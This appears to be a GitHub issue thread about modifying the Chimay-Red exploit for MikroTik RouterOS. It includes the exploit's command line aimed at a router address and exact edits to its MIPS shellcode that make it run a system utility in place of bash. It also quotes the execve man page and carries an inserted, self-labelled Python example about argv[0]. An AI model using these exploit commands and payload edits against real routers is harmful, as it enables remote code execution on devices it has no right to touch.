Chimay-Red
Got stuck rewriting shellcode
Could you help with editing the shellcode? I want to send just /nova/bin/info, bypassing the bash shell.
Why do you want to edit the shellcode? Just write this command:
./StackClash_mips.py 192.168.8.1 80 www_binary '/nova/bin/info "your_mikrotik_command" '
I want to rewrite it because I'm dealing with an already hacked device, and the standard way is not working. Because the device is accessible on port 80 and reports the same (vulnerable) RouterOS version, my idea is to rewrite the shellcode to run just the system utility, not bash. Possibly the attackers did something to bash.
So edit this line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L126 Replace
shell_code += b'/bin/bash\x00'
with
shell_code += b'/nova/bin/info\x00'
Edit line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L129 Replace
shell_code += b'-c\x00'
with
shell_code += b'\x20\x00'
Now you can use it:
./StackClash_mips.py 192.168.8.1 80 www_binary "your_mikrotik_command"
I didn't test these mods, but I think they will work.
Thanks, I thought about this, but this way I'll get execve("/nova/bin/info", ["/nova/bin/info", " ", "user_command"]). Is it normal to repeat the executable in the parameter array?
...yes http://man7.org/linux/man-pages/man2/execve.2.html
argv is an array of argument strings passed to the new program. By
convention, the first of these strings (i.e., argv[0]) should contain
the filename associated with the file being executed.
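Added example (not from the thread or the Chimay-Red project) illustrating the man page point above: the kernel executes the pathname passed to execve, while argv[0] is only a convention that the new program sees as its own name. Python's subprocess lets the two be set independently via the `executable` parameter, and /bin/sh exposes its argv[0] as `$0`, so the child can report back what it received. It assumes a POSIX system with /bin/sh.

```python
import subprocess


def run_with_argv0(path, argv0, args):
    """Execute `path` with an explicitly chosen argv[0], mirroring
    execve(path, [argv0, *args], envp). Returns the child's stdout."""
    result = subprocess.run(
        [argv0, *args],       # argv as the child program will see it
        executable=path,      # the file the kernel actually loads
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


def argv0_seen_by_child(argv0):
    """Launch /bin/sh with the given argv[0] and return the $0 it observes.
    With `sh -c` and no extra operands, $0 is the shell's own argv[0]."""
    return run_with_argv0("/bin/sh", argv0, ["-c", 'printf "%s" "$0"'])


def positional_args_seen_by_child(args):
    """Show that everything after argv[0] arrives unchanged: the shell
    prints each operand after the command string, separated by '|'."""
    script = 'for a in "$@"; do printf "%s|" "$a"; done'
    # "sh" here fills the $0 slot, so `args` become $1, $2, ...
    return run_with_argv0("/bin/sh", "/bin/sh", ["-c", script, "sh", *args])


if __name__ == "__main__":
    # Conventional call: argv[0] repeats the pathname, as the man page describes.
    print(argv0_seen_by_child("/bin/sh"))
    # Unconventional argv[0]: the kernel still runs /bin/sh; only $0 changes.
    print(argv0_seen_by_child("not-a-real-path"))
    print(positional_args_seen_by_child(["first", "second"]))
```

The second call shows why repeating the path in argv[0] is normal rather than required: execution is driven by the pathname argument, and argv[0] is simply what the program is told it was called as. Programs that branch on their own name (busybox-style multi-call binaries, or a shell deciding whether it is a login shell) are the reason the convention matters.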
Oh, thank you!